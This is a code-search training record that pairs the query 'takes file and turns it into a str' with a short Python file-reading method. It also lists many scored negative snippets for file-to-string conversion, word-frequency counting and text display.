= 'text model name: ' + self.name + '\\n' \n s += ' number of words: ' + str(len(self.words)) + '\\n'\n s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\n s += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\\n'\n s += ' number of word stems: ' + str(len(self.stems)) + '\\n'\n s += ' number of commas counts: ' + str(len(self.commas_per_sentence)) + '\\n'\n return s", "def get_text(self):\n return self.text", "def text(self):\n return str(self.input.text())", "def set_text(self, T):\n self.text = T", "def __repr__(self):\n s = 'text model name: ' + self.name + '\\n'\n s += ' number of words: ' + str(len(self.words)) + '\\n'\n s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\n s += ' number of stems: ' + str(len(self.stems)) + '\\n'\n s += ' number of sentence lengths: ' + str(len(self.sentence_lengths))\\\n + '\\n'\n s += ' number of punctuation types: ' + str(len(self.punctuation))\n return s", "def display_text(self, text):\n self.update_screen_size()\n self.stdscr.erase()\n for line in text:\n self.stdscr.addstr(f'{PADCHAR}{line}\\n')\n self.stdscr.addstr(PADCHAR)\n self.get_key()", "def edit(self, text):\n return self._edit_engine(text, break_on_success=False)", "def __repr__(self) -> str:\n return f\"{self.text}\"", "def showcontents(self):\n # See ToolTip for an example\n raise NotImplementedError", "def text(self):\n return self.full_text", "def getText(self):\n return self.text", "def getText(self):\n return self.text", "def visualize_model(self):\n if self.model is None:\n print(\"%s.visualize: implement me\" % (self.__class__.__name__))", "def display_text(self, display_text):\n\n self._display_text = display_text", "def draw(self):\n if self.dirty:\n self._render()\n for text in self.text_lines:\n text.draw()", "def main():\n logging.basicConfig(level=logging.WARN)\n\n text = extract()\n text, char_indices, indices_char, x, y = transform(text)\n model(text, char_indices, indices_char, x, y)\n\n pass", "def obtain_text():\n pass", "def __repr__(self):\n s= 'text model name: ' + self.name + '\\n'\n s+= 'number of words: ' + str(len(self.words)) + '\\n'\n s+='number of word lengths: ' + str(len(self.word_lengths))+'\\n'\n s+='number of word stems: ' + str(len(self.stems)) + '\\n'\n s+='number of sentence lengths: ' + str(len(self.sentence_lengths)) +'\\n'\n s+='number of word suffixes: '+ str(len(self.endings))\n \n return s", "def get_text(self):\n return self.get_property('text')", "def display_text(self, text, size=None, colr=None,\r\n x = None, y = None,\r\n new_line = None):\r\n if size is None:\r\n size = self.dt_size\r\n self.size = size\r\n if colr is None:\r\n colr = self.text_color\r\n self.text_color = colr\r\n if new_line is not None:\r\n if x is not None or y is not None:\r\n raise Exeception(\"Must not have new_line and x,y\")\r\n else:\r\n if x is not None or y is not None:\r\n new_line = False\r\n else:\r\n new_line = True\r\n if new_line:\r\n x = self.dt_x = self.disp_left\r\n self.dt_y -= size*self.font_size_to_ch\r\n y = self.dt_y\r\n #print(f\"new_line: y:{y} dt_y:{self.dt_y}\")\r\n else:\r\n if x is None:\r\n x = dt_x\r\n self.dt_x = x\r\n if y is None:\r\n y = self.dt_y\r\n self.dt_y = y\r\n #print(f\"display_text: text:{text} x:{x}, y:{y}\")\r\n tu.penup()\r\n if y < self.disp_bottom + self.disp_boarder:\r\n continue_msg = \"Press ENTER to continue\"\r\n inp = input(continue_msg)\r\n self.clear_text() # Only option \r\n \r\n tu.goto(x,y)\r\n tu.pendown()\r\n \r\n tu.color(colr)\r\n font = (\"Arial\", size, \"normal\")\r\n #print(f\"colr:{colr} text:{text} font:{font}\")\r\n #print(f\"xcor():{tu.xcor()} ycor():{tu.ycor()}\")\r\n tu.write(text, align=\"left\", font=font)", "def editText(self, text, jumpIndex=None, highlight=None):\n try:\n import gui\n except ImportError, e:\n print 'Could not load GUI modules: %s' % e\n return text\n editor = gui.EditBoxWindow()\n return editor.edit(text, jumpIndex=jumpIndex, highlight=highlight)", "async def getDisplayText(self):\n display_text = await self.director.getItemVariableValue(\n self.item_id, \"DISPLAY_TEXT\"\n )\n return display_text", "def text(self, str):\n self.__r.t._setText(_to_unicode(str))", "def test_model():\n test_text = \"what is the price of jug?\"\n model = spacy.load(\"../model/custom_ner_model\")\n doc = model(test_text)\n for ent in doc.ents:\n print(ent.text, ent.start_char, ent.end_char, ent.label_)", "def GetText(self):\r\n \r\n return self._text", "def refresh(self, event):\n self.updatetext(self.textfunc, self.textargs)", "def text(self, text, color=defcolor):\n # Line height including spacing.\n lineh = self.font['height'] + 1\n # Calculate characters we can have per line.\n chars_per_line = self.x // (self.font['width'] + 1)\n # Split the text into its lines.\n linelist = striptomatrix.listto2d(text, chars_per_line)\n # How many lines can we fit on the screen?\n maxlines = self.y // (self.font['height'] + 1)\n # If the text doesn't fit the screen, scroll:\n if len(linelist) > maxlines:\n self.reset()\n self.scrollproc = threading.Thread(target=self.scroll_text,\n args=(text, color))\n self.killedevent.wait()\n self.scrollproc.start()\n # If the text does fit\n else:\n self.insert_lines(linelist, color)\n self.show()", "def show(self):\n import IPython.display\n disp = IPython.display.HTML(self.render())\n return IPython.display.display(disp, display_id=str(id(self)))", "def get_plain_text(self):\n raise NotImplementedError(\"get_plain_text is not implemented\")", "def main_window_text(self) -> None:\n tk.Label(text='Название книги:').grid(row=0, column=0, padx=10, pady=10)\n tk.Label(text='Автор:').grid(row=1, column=0, padx=10)\n tk.Label(text='Жанр:').grid(row=2, column=0, padx=10, pady=10)\n entry_title = tk.Entry(width=45)\n entry_title.grid(row=0, column=1, sticky=tk.W)\n entry_author = tk.Entry(width=45)\n entry_author.grid(row=1, column=1, sticky=tk.W)\n entry_genre = tk.Entry(width=45)\n entry_genre.grid(row=2, column=1, sticky=tk.W)", "def text(self) -> str:\n return self._impl.get_text()", "def WriteText(self, text):\n print(text)", "def __unicode__(self):\r\n return self.text", "def __unicode__(self):\r\n return self.text", "def __unicode__(self):\r\n return self.text", "def __unicode__(self):\r\n return self.text", "def on_lineEdit_textChanged(self, p0):\n # str_me = \"我爱我的祖国\"\n # self.lineEdit.setText(str_me) # 设置单行文本内容\n input_text = self.lineEdit.text()\n self.textEdit.setPlainText(input_text)\n # self.textEdit.setHtml(input_text) # 显示Html,如 <font color='red' size='20'>HELLO!</font>\n a = self.textEdit.toPlainText()\n print(a)", "def showText(self, window, text, color=None, size=None):\n if not color: color = self.text_color\n if not size: size = self.text_size\n self.center.showText(window, text, color=color, size=size)", "def getTextFromSpeak(self):\n raise NotImplementedError", "def ui_output_text(morzeText: str):\n print(morzeText)", "def display_eng(self):\n self.clear_terminal()\n self.menu_eng()\n self.handle_selection_eng()", "def visualize(model, num_topics=num_topics, num_words=num_words,\r\n vocab=idx2word, show_emb=True,\r\n tokenizer=tokenizer, bert_model=bert):\r\n model.eval() # set the net in evaluation mode\r\n # set a few words to query\r\n queries = ['insurance', 'weather', 'particles', 'religion', 'man', 'love',\r\n 'intelligence', 'money', 'politics', 'health', 'people', 'family']\r\n\r\n ## visualize topics using monte carlo (sampling from the posterior I guess)\r\n with torch.no_grad(): # no gradients computation - makes forward pass lighter\r\n print('-' * 20)\r\n print('Visualize topics...')\r\n topics_words = []\r\n gammas = model.get_beta() # topics distributions\r\n for k in range(num_topics):\r\n gamma = gammas[k]\r\n top_words = list(gamma.cpu().numpy().argsort()[-num_words + 1:][::-1])\r\n topic_words = [vocab[a] for a in top_words]\r\n topics_words.append(' '.join(topic_words))\r\n print('Topic {}: {}'.format(k, topic_words))\r\n\r\n if show_emb:\r\n ## visualize word embeddings by using V to get nearest neighbors\r\n print('-' * 20)\r\n print('Visualize word embeddings by using output embedding matrix')\r\n\r\n # extract the embeddings from the model!\r\n try:\r\n embeddings = model.rho.weight # Vocab_size x E\r\n except:\r\n embeddings = model.rho # Vocab_size x E\r\n\r\n for word in queries:\r\n # extracting Bert representation of the word\r\n inputs = tokenizer(word, return_tensors=\"pt\")\r\n outputs = bert_model(**inputs).last_hidden_state[0]\r\n outputs.requires_grad = False\r\n if outputs.size()[0] > 1: # aggregate\r\n outputs = torch.sum(outputs, dim=0)\r\n nns = utils.nearest_neighbors(q=outputs,\r\n embeddings=embeddings, vocab=list(vocab.values()))\r\n print('word: {} .. neighbors: {}'.format(word, nns)) # utility function\r", "def Add_Text( self, th ):\r\n self.text_handle = th", "def text_reader(file_path,text_edit):\n\n parent.ui.textEdit_design_image.clear()\n path = os.getcwd()+'\\media\\docs' + file_path\n f = open(path,'r');\n for x in f:\n text_edit.insertPlainText(x)", "def show_text(self, lang):\n return markdown(self.text % dict(\n [(k, e_html(unicode(v), True)) for k, v in self.vars.items()]\n ), output_format=\"html5\")", "def printModel(self):\n print(self.model)", "def Text(self):\n return self._text", "def _draw_line_text(self):\n self._line_text.set_text(self.model.get_current_line())" ]
[ "0.64818233", "0.6356436", "0.6119905", "0.5938623", "0.5938623", "0.5938623", "0.5938623", "0.5938623", "0.5912198", "0.5831747", "0.5817723", "0.5801984", "0.57914543", "0.5775937", "0.5744499", "0.57407993", "0.5716162", "0.5654628", "0.5648894", "0.5643585", "0.56414855", "0.56351936", "0.56199723", "0.56030965", "0.556664", "0.5554339", "0.55513424", "0.55486286", "0.55469596", "0.5538714", "0.55380493", "0.55380493", "0.55380493", "0.55380493", "0.55380493", "0.55353034", "0.55309474", "0.5498713", "0.5473159", "0.54588044", "0.54569787", "0.54511464", "0.5417461", "0.54156077", "0.54156077", "0.5407263", "0.5400165", "0.53936696", "0.5356481", "0.534389", "0.5341324", "0.53219986", "0.5307917", "0.5296975", "0.52843094", "0.5277901", "0.52693117", "0.52629006", "0.5257897", "0.5256543", "0.52547526", "0.5245514", "0.52336544", "0.5222657", "0.5222657", "0.5221348", "0.52180874", "0.52153945", "0.52055806", "0.5203599", "0.5197284", "0.5195397", "0.5184675", "0.5180702", "0.5180693", "0.51768273", "0.51637256", "0.5155399", "0.515386", "0.51522326", "0.5150645", "0.5147816", "0.5147401", "0.5136565", "0.5135977", "0.5131778", "0.5131778", "0.5131778", "0.5131778", "0.5127327", "0.512545", "0.5121425", "0.511591", "0.51124585", "0.5111461", "0.51111627", "0.51064765", "0.5099283", "0.50991464", "0.50958407", "0.50953907" ]
0.0
-1
takes file and turns it into a str
def readTextFromFile(self, filename): f = open(filename) self.text = f.read() f.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def file2str(file):\n with open(file, \"r\") as textFile:\n return textFile.read()", "def file_to_string(path_to_file):\n\t\twith open(path_to_file, 'r') as f:\n\t\t\tcontent = f.read()\n\t\treturn content", "def txt2str(file: str) -> str:\n return get_first_line(file)", "def file_to_str(fname):\n data = None\n # rU = read with Universal line terminator\n with open(fname, 'rU') as f:\n data = f.read()\n return data", "def file_to_str(filename):\n with open(filename) as f:\n return f.read().lower() # Case is lowered to prevent regex mismatches.", "def file_to_str(filename):\n with open(filename) as f:\n return f.read().lower() # Case is lowered to prevent regex mismatches.", "def file_to_string(file_name):\n with open(file_name, 'r') as f:\n text = f.read()\n # delete original file\n os.remove(file_name)\n return text", "def file_to_string(file_path):\n data = ''\n try:\n with open(file_path, 'r') as file:\n data = file.read()\n file.close()\n except FileNotFoundError as err: # Sublime give an error, but it's not.\n print(Bcolors.FAIL + 'ERROR: ' + file_path + ' not found.' + Bcolors.ENDC)\n print(str(err))\n sys.exit(2)\n except PermissionError as err:\n print(Bcolors.FAIL + 'ERROR: ' + file_path + ', Permission Denied.' + Bcolors.ENDC)\n print(str(err))\n sys.exit(2)\n return data", "def load_file():\n s = ''\n\n with open(FILE_PATH) as f:\n for line in f:\n # .rstrip method gets rid of new line \"\\n\" characters\n s = s + line.rstrip() \n return s", "def local_file_as_string(self, file_path):\n with open(file_path, 'rb') as file:\n string = file.read().decode('utf-8')\n return string", "def _make_string(self, filename):\n\n if not os.path.isfile(filename):\n str = \"ERROR: Could not find specified XML file %s.\" % filename\n PRINT.info(str)\n raise OSError(str)\n\n return open(filename).read()", "def ReadFileIntoString(filepath):\n with open(filepath, 'r') as file_handle:\n contents = file_handle.read()\n return contents", "def get_fable_string():\n f = open(\"fable.txt\", \"r\")\n fable = str(f.read())\n f.close()\n return fable", "def read_file(file):\n with open(file, 'r') as f:\n file_string = f.read()\n return file_string", "def convert_vtt_to_str(file):\n if \".vtt\" in file:\n vtt_to_srt(file)", "def read_file(file) -> str:\n file = open(file, \"r\")\n my_string = file.read()\n return get_clean_text(my_string)", "def read_file(self, file: Path) -> str:\n with open(file) as f:\n return f.read()", "def get_file_content(self, file_name: str):\n file_name = Path(__file__).absolute().parents[1].joinpath(file_name)\n try:\n with file_name.open('r') as file:\n intermediate = file.readlines()\n return ''.join(intermediate)\n except FileNotFoundError as message:\n self.logger.error(message)\n return ''", "def ofile_string(self):\n fp = self.ofile_handle()\n if (fp):\n return \"\\n\".join([line.rstrip() for line in fp])\n return None", "def efile_string(self):\n fp = self.efile_handle()\n if (fp):\n return \"\\n\".join([line.rstrip() for line in fp])\n return None", "def read_file(file_path):\n\n file_string = ''\n\n with open(file_path, 'r', newline='') as file:\n for line in file:\n file_string = file_string + line.rstrip('\\n')\n\n return file_string", "def get_file_text(file_name):\n\tf = open(file_name, 'r')\n\ttext = f.read()\n\treturn text", "def _read_file(self) -> str:\n with open(self._file_name) as fp:\n return fp.read()", "def load_text_data(filepath: str) -> str:\n with open(filepath) as text_file:\n text_from_file = text_file.read()\n\n return str.strip(text_from_file) # str.strip removes leading/trailing whitespace", "def replace_with_file_contents(fname):\n try:\n with open(os.path.expanduser(fname[0])) as source_file:\n result = source_file.read()\n except IOError:\n result = '< %s' % fname[0] # wasn't a file after all\n\n # TODO: IF pyparsing input parser logic gets fixed to support empty file, add support to get from paste buffer\n return result", "def _file_read(self, file: str) -> str:\n with open(f\"tests/resources/{file}\", \"r\") as fs:\n result = \"\\n\".join(fs.read().splitlines())\n return result", "def __file_from_int_to_str(file: int) -> str:\n # Warning, my own, not very well tested implementation of base26 converter\n output_chars = 1\n while (len(ascii_lowercase)) ** output_chars <= file:\n output_chars += 1\n values = []\n for i in range(output_chars):\n val = (file // len(ascii_lowercase) ** i) % (len(ascii_lowercase))\n values.append(val)\n\n return \"\".join(ascii_lowercase[x] for x in reversed(values))", "def read_as_text(filename: str) -> str:\n with open(filename) as file_handle:\n txt = file_handle.read()\n return txt", "def read_from_file(filename):\n with open(filename, 'r') as f:\n lines = [line for line in f]\n\n return \"\".join(lines)", "def read_data() -> str:\n with open('input.txt') as input_file:\n return input_file.read()", "def read_file(file):\n try:\n with open(file, \"r\") as f:\n content = f.read().replace(\"\\n\", \"\")\n return content\n except:\n return f\"[ERROR]: could not open '{file}'\"", "def parse(filename: str) -> str:\n with open(filename) as file:\n return file.readline().strip()", "def get_text_from_file(filepath):\n with open(filepath, 'r') as f:\n return f.read()", "def contents(file):\n with open(file) as f:\n return f.read()", "def _get_string(self):\n result = self.sfile.readline().rstrip('\\n')\n return result", "def getStoryString():\n return open(\"story.txt\", \"r\").read()", "def getStoryString():\n return open(\"story.txt\", \"r\").read()", "def read_file(input_file):\n\n\ttext = open(input_file)\n\traw = text.read()\n#\tdecoded = raw.decode('utf8').encode('ascii', 'replace')\n\tdecoded = raw.decode('utf8')\n\n\t#moves this through the html cleaner\n\ttext = plaintext(decoded)\n\n\treturn text", "def format_filename(fname):\n\treturn ''.join(convert_valid(one_char) for one_char in fname)", "def source_file_contents(source_dir, file_name):\n file_n_path = join(source_dir, file_name)\n with open(file_n_path, encoding='utf-8') as checked:\n return checked.read().rstrip()", "def file_to_txt(file_path, dst_dir, new_file_name=None, ret_fname=False,\n clean_path=False):\n if clean_path:\n try:\n file_path = _filepath_clean(file_path)\n except IOError:\n sys.stdout.write('unable to clean file_name %s \\n' % file_path)\n file_name = os.path.split(file_path)[1]\n name, ext = os.path.splitext(file_name)\n ext = re.sub(r'\\.', '', ext)\n if new_file_name:\n file_name = new_file_name\n converter_func_name = '_%s_to_txt' % ext\n if converter_func_name in globals().keys():\n # calls one of the _to_txt()\n out = eval(converter_func_name)(file_path, dst_dir, file_name)\n if out:\n sys.stdout.write('unable to process file %s' % file_path)\n if ret_fname:\n return file_name\n else:\n sys.stdout.write('file type %s not supported, skipping %s \\n' %\n (ext, file_name))", "def read_text_file(str_name_file: str):\n content: str = ''\n with open(str_name_file, mode=\"r\", encoding='utf-8') as file:\n print(\"file being read: \" + str_name_file + \"\\n\")\n content = file.read()\n return content", "def openFile(filepath):\n assert checkExistenceFile(filepath), \"filepath does not exist\"\n with open(filepath, \"r\", encoding=\"utf-8\") as f:\n text = \" \".join(map(lambda x: x.rstrip(\"\\n\"), f.readlines()))\n return text", "def format(self):\n self.clear_whitespace()\n self.to_ascii()\n return self._filename", "def get_file_data(file_name):\r\n try:\r\n with open(file_name, 'rb') as input_file:\r\n data = input_file.read()\r\n return data\r\n except Exception as err:\r\n return str(err).encode()", "def get_json_str(self):\n\n with open(self.path, mode='r', encoding='utf-8') as file:\n return file.read()", "def format_filename(fname):\n return ''.join(convert_valid(one_char) for one_char in fname)", "def fileread(self, filename):\n data = None\n f = open(filename, 'r')\n data = f.read()\n f.close()\n try:\n data = data.decode()\n except (UnicodeDecodeError, AttributeError):\n data = data.encode(\"utf-8\")\n\n return data", "def srt_to_txt(srt_file):\n text = ''\n for index, item in enumerate(srt_file):\n if item.text.startswith(\"[\"):\n continue\n text += \"(%d) \" % index\n text += item.text.replace(\"\\n\", \"\").strip(\"...\").replace(\n \".\", \"\").replace(\"?\", \"\").replace(\"!\", \"\")\n text += \". \"\n return text", "def str_for_file(xs):\n # Encode to ASCII.\n xs = xs.encode('ascii', 'ignore').decode()\n\n # Convert characters.\n convert = {':': ',',\n ';': ','}\n for char_from, char_to in convert.items():\n print(xs, char_from, char_to)\n xs = xs.replace(char_from, char_to)\n\n # Finally, whitelist characters.\n allowed = uppercase + lowercase + digits + '- !()-_=+\\'\",.'\n return ''.join(filter(lambda x: x in allowed, xs))", "def readfile(filename):\n\n infile = open(filename, \"r\") # open file for reading\n\n # Use Python's file read function to read the file contents\n filetext = infile.read().splitlines()\n\n infile.close() # close the file\n\n return filetext # the text of the file, as a single string", "def get_text(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n file_text = file.read()\n return file_text", "def read_file(filename):\n return open(filename).read()", "def _fn2ascii(self, filename): \n nameBase, ext = Path(Path(filename).basename()).splitext()\n try: nameBase.encode('ascii')\n except UnicodeEncodeError:\n nameBase = nameBase.encode('utf-8').encode('hex')\n try:\n ext = ext.encode('ascii')\n except UnicodeEncodeError:\n ext = ext.encode('utf8').encode('hex')\n return str(nameBase + ext)", "def read(file):\n with open(file, 'r') as file:\n return file.read()", "def image_file_to_string(filename, cleanup = cleanup_scratch_flag, graceful_errors=True, lang='eng'):\n\ttry:\n\t\ttry:\n\t\t\tcall_tesseract(filename, scratch_text_name_root)\n\t\t\ttext = retrieve_text(scratch_text_name_root, lang)\n\t\texcept Tesser_General_Exception:\n\t\t\tif graceful_errors:\n\t\t\t\tim = Image.open(filename)\n\t\t\t\ttext = image_to_string(im, cleanup)\n\t\t\telse:\n\t\t\t\traise\n\tfinally:\n\t\tif cleanup:\n\t\t\tperform_cleanup(scratch_image_name, scratch_text_name_root)\n\treturn text", "def open_and_read_file(file_path):\n\n # Open file and read into memory\n text = open(file_path).read().rstrip()\n\n # Replace newlines with space\n #text = text.replace('\\n', ' ')\n\n return text", "def read_text_from_file(file_path):\n validate_txt_extension(file_path)\n with open(file_path) as file:\n # Read all the lines from the file, and concatenate into a single string.\n return ''.join([line for line in file])", "def getOneFileContent(fpath):\n\twith open(fpath, 'r') as contentFile:\n\t\tdocStr = contentFile.read()\n\treturn docStr", "def read_file(filepath: str) -> str:\n with open(filepath, \"r\") as filep:\n return filep.read()", "def read_file(file_name, enc=\"latin-1\"):\n f = open(file_name, \"r\", encoding=enc)\n content = \"\".join(f.readlines())\n f.close()\n return content", "def image_file_to_string(filename, lang = _language, cleanup = cleanup_scratch_flag, graceful_errors=True):\n\ttry:\n\t\ttry:\n\t\t\t# print filename\n\t\t\tcall_tesseract(filename, scratch_text_name_root, lang)\n\t\t\ttext = util.retrieve_text(scratch_text_name_root)\n\t\texcept errors.Tesser_General_Exception:\n\t\t\tif graceful_errors:\n\t\t\t\tim = Image.open(filename)\n\t\t\t\tprint(filename)\n\t\t\t\tprint('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!对图像进行特殊处理')\n\t\t\t\ttext = image_to_string(im, cleanup)\n\t\t\telse:\n\t\t\t\traise\n\tfinally:\n\t\tif cleanup:\n\t\t\tutil.perform_cleanup(scratch_image_name, scratch_text_name_root)\n\treturn text", "def read_file(path): #TODO implementme, handling paths more intelligently\n f = open(path, \"r\")\n string = f.read()\n f.close()\n return string", "def read_file(self, file):\n buffer = ''\n for line in file.readlines():\n line = line.strip()\n if not line.startswith('#'):\n buffer += ' ' + line\n return buffer", "def readfile(path: Union[str, Path]) -> str:\n with open(path) as infile:\n return infile.read()", "def read_file(name_file):\n with open(name_file, 'r') as file:\n return file.read()", "def convert_file_extension_to_txt(image_file):\n\treturn image_file.split('.')[0] + '.txt'", "def readfile(filename):\n with open(filename, encoding=\"utf-8\") as file:\n raw = file.read()\n return raw", "def _read_data(self, txtfile):\n data_string = open(txtfile,'r').read()\n return data_string", "def read_file(name):\n with open(name, 'r') as my_file:\n return my_file.read().encode('utf-8')", "def read_file(file):\n with open(file, \"r\") as fid:\n return fid.read()", "def read_file(self, file_name: str)-> str:\n if not os.path.exists(file_name):\n raise IOError(\"The File {} doesn't exists!\".format(file_name))\n\n with open(file_name) as file:\n return file.read().strip()", "def getFileContent(fileName, encoding = \"UTF-8\"):\n file = io.open(fileName, mode = \"r\", encoding = encoding)\n text = file.read()\n file.close()\n return text", "def _read_file(fname):\n with open(fname) as fobj:\n for line in fobj:\n yield _tostr(line).strip()", "def read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read().strip()", "def _readfile(dirpath, filename):\n try:\n with codecs.open(os.path.join(dirpath, filename), \"r\", \"utf-8\") as f:\n return f.read()\n except IOError:\n return u\"\"", "def read_file(filename):\n fh = open(filename, \"r\")\n file_str = fh.read()\n file_str = re.sub(\"$\\n\", \"\", file_str)\n fh.close()\n return file_str", "def _(fname: str) -> str:\n with open(os.path.join(os.getcwd(), fname)) as readme:\n content = readme.read() or '' # prevent ``content = None``\n return content", "def read_file(file_path):\n\n text = ''\n with open(file_path, 'r') as file:\n for line in file.readlines():\n text += line\n return text", "def read_file(filename=\"\"):\n with open(filename, 'r') as f:\n f_contents = f.read()\n print(f_contents, end='')", "def get_file_content(filename):\n file_contents = ''\n with open(filename) as f:\n file_contents = f.read()\n return file_contents", "def read_file(filename=\"\"):\n with open(filename, 'r', encoding='utf-8') as fl:\n print(fl.read(), end='')", "def read_file(file_path, mode='r', encoding=\"utf-8\"):\n with codecs.open(file_path, mode, encoding=encoding) as fp:\n return fp.read().strip()", "def readText(fileName):\n fileText = \"\"\n with open(fileName,\"r\") as fileObject:\n fileText = fileObject.read()\n \n return fileText", "def slurp(path):\n with open(path) as f:\n return f.read().strip()", "def unifyString(cls, fileArray):\n string = \"\"\n for i, v in enumerate(fileArray):\n string = string + chr(v)\n return string", "def load_text(filename):\n\n return \" \".join(list(\n map(\n lambda word: word.strip(), open(filename))))", "def read_file(file_path):\n with open(file_path, 'r') as infile:\n return infile.read()", "def open_and_read_file():\n\n file_path = sys.argv[1]\n input_file = open(file_path).read()\n return input_file\n\n # your code goes here\n\n #return \"This should be a variable that contains your file text as one long string\"", "def citeste_fisier(path: str) -> str:\n file_object = open(path, mode=\"rt\")\n file_content = file_object.read()\n return file_content", "def txt2txt(fname, skip=None):\n with codecs.open(fname, 'r', encoding='utf-8') as f_in:\n content = f_in.read()\n\n\tcontent.replace('\\r', '').replace('\\x0C', '')\n\n return content", "def read_file(filename=\"\"):\n\n with open(filename, encoding=\"utf-8\") as n:\n print(n.read(), end=\"\")", "def read_file(file):\n f = open(file, \"r\", encoding=\"utf8\")\n return f.read()", "def read_file(filename=\"\"):\n\n with open(filename, 'r') as f:\n read_data = f.read()\n\n print('{:s}'.format(read_data), end='')\n\n f.closed", "def read_file(filename: str, mode: str = \"r\") -> str:\n with open(filename, mode) as file:\n file_content = file.read()\n return file_content", "def vtt_to_srt(str_name_file: str):\n file_contents: str = read_text_file(str_name_file)\n str_data: str = \"\"\n str_data = str_data + convert_content(file_contents)\n str_name_file: str = str_name_file.replace(\".vtt\", \".srt\")\n print(str_name_file)\n file_create(str_name_file, str_data)", "def read_from_file(file_name):\n with open(file_name, \"rb\") as text_file:\n return text_file.read()", "def convert_file(fname):\n md = markdown.Markdown(extensions=['extra'], tab_length=2)\n with open(fname, \"r\") as f:\n content = ''.join(f.readlines())\n return md.convert(content)", "def get_HTML(file):\r\n\r\n f = open(file, 'r')\r\n lines = f.readlines()\r\n f.close()\r\n return \"\".join(lines)", "def prepare_file(lines):\n return \" \".join(line.strip() for line in lines)", "def read_file(filename=\"\"):\n with open(filename, 'r', encoding='utf-8') as fi:\n print(fi.read(), end=\"\")" ]
[ "0.8525866", "0.7717556", "0.77115536", "0.7649846", "0.7578865", "0.7578865", "0.7481903", "0.7253718", "0.70882875", "0.708055", "0.704386", "0.67967176", "0.677502", "0.67743015", "0.67640656", "0.6590976", "0.65571094", "0.64584035", "0.64482987", "0.6414025", "0.64015496", "0.6323589", "0.62894565", "0.62592614", "0.624228", "0.61986595", "0.6193674", "0.61897534", "0.618773", "0.61519", "0.61384267", "0.6134697", "0.61128557", "0.6106033", "0.61049736", "0.6092583", "0.6092583", "0.6080453", "0.6079707", "0.60780084", "0.60706997", "0.60586476", "0.6056987", "0.60315025", "0.6027354", "0.6014972", "0.60089856", "0.5999898", "0.59846383", "0.5981039", "0.5965841", "0.5965305", "0.594827", "0.5941301", "0.5934368", "0.5934237", "0.59339166", "0.5924755", "0.592462", "0.59087044", "0.59046143", "0.5902484", "0.5898166", "0.58962375", "0.5889131", "0.5877632", "0.5875565", "0.58732295", "0.5856612", "0.58473486", "0.5846714", "0.58426905", "0.5841077", "0.58339155", "0.5828111", "0.58229584", "0.5822674", "0.58197117", "0.58009696", "0.5789374", "0.57869714", "0.57833743", "0.5779865", "0.576917", "0.57638127", "0.57531434", "0.57422173", "0.5741138", "0.5740983", "0.5734529", "0.57289386", "0.57244927", "0.57229257", "0.5719035", "0.5715653", "0.5690626", "0.56874865", "0.5685678", "0.5681482", "0.5680778", "0.567191" ]
0.0
-1
takes str from self.text and creats dict of sentence length freq.
def makeSentenceLengths(self): count = 0 LoW = self.text.split() list = [] for x in range(len(LoW)): if '.' in LoW[x] or '?' in LoW[x] or '!' in LoW[x] : length = x list += [len(LoW[count: x+1])] count = length + 1 for x in list: if x not in self.sentencelengths : self.sentencelengths[x] = 1 else: self.sentencelengths[x] += 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_freq_dict(text):\n freq_dict = {}\n for i in text:\n if i not in freq_dict:\n freq_dict[i] = 1\n else:\n freq_dict[i] += 1\n return freq_dict", "def make_frequency_dict(self, text):\n\t\t\tfrequency = {}\n\t\t\t#tomamos los numeros como caracteres entonces el diccionario solo tendra un rango (0,9) las ',' y '\\n'\n\t\t\tfor character in text:#O(len(row)*columns) \n\t\t\t\tif not character in frequency:#como frequency es un diccionario es de O(1)\n\t\t\t\t\tfrequency[character] = 0\n\t\t\t\tfrequency[character] += 1\n\t\t\t\n\t\t\treturn frequency", "def create_freq_dict(corpus, doc_info):\n for idx, content in enumerate(corpus):\n word_freq_table = {}\n splitted_sentence = content.split()\n for word in splitted_sentence:\n word = word.lower()\n if word not in word_freq_table:\n word_freq_table[word] = 1\n else:\n word_freq_table[word] += 1\n doc_info[idx]['freq_dict'] = word_freq_table", "def build_frequency_dict(text: bytes) -> Dict[int, int]:\n freq_dic = {}\n for elem in text:\n if elem not in freq_dic:\n freq_dic[elem] = 1\n else:\n freq_dic[elem] += 1\n return freq_dic", "def word_lengths(sentence):\n\n word_count_dict = {}\n sentence = sentence.split()\n\n for word in sentence:\n length = len(word)\n if length not in word_count_dict:\n word_count_dict[length] = {word}\n else:\n set = word_count_dict[length]\n set.add(word)\n\n return word_count_dict", "def text2wordfreq(string, lowercase=False):\r\n\r\n\r\n from collections import Counter\r\n lst = Counter(tokenize(string, lowercase)).most_common()\r\n\r\n dictLst = dict(lst)\r\n\r\n return dictLst", "def word_frequency_table(self, text_string):\r\n stopWords = set(stopwords.words(\"english\"))\r\n words = word_tokenize(text_string)\r\n ps = PorterStemmer()\r\n\r\n freqTable = dict()\r\n for word in words:\r\n word = ps.stem(word)\r\n if word in stopWords:\r\n continue\r\n if word in freqTable:\r\n freqTable[word] += 1\r\n else:\r\n freqTable[word] = 1\r\n\r\n return freqTable", "def wordFreq(parseThis):\n \n freq = {}\n nono = ('\"', \"'\", '%', '$', '!', '.', '?', '-', ','\n , '\\n', '\\t', '\\r', ':', ';')\n\n for c in nono:\n parseThis = parseThis.replace(c, \" \")\n \n words = parseThis.split()\n \n for word in words:\n temp = word.lower()\n freq[temp] = freq.get(temp, 0) + 1\n\n return freq", "def word_frequency():\n\n song = open(\"data/yellow_submarine.txt\")\n d = dict()\n for line in song:\n line = line.strip()\n line = line.lower()\n punctuations = \"\"\"!()-[]{};:'\"\\,<>./?@#$%^&*_~\"\"\" # remove punctuation https://www.programiz.com/python-programming/examples/remove-punctuation\n no_punct = \"\" # remove punctuation\n for char in line: # remove punctuation\n if char not in punctuations: # remove punctuation\n no_punct = no_punct + char # remove punctuation\n words = line.split(\" \")\n for word in words:\n d[word] = d.get(word, 0) + 1\n return d", "def frequency(self):\n # BEGIN\n \n freq = {} \n # for word in my_list:\n # for letter in word:\n # keys=freq.keys()\n # if letter in keys:\n # freq[letter]+=1\n # else:\n # freq[letter]=1\n # return freq\n\n whole = ''.join(WordSet(self.text).words())\n \n for 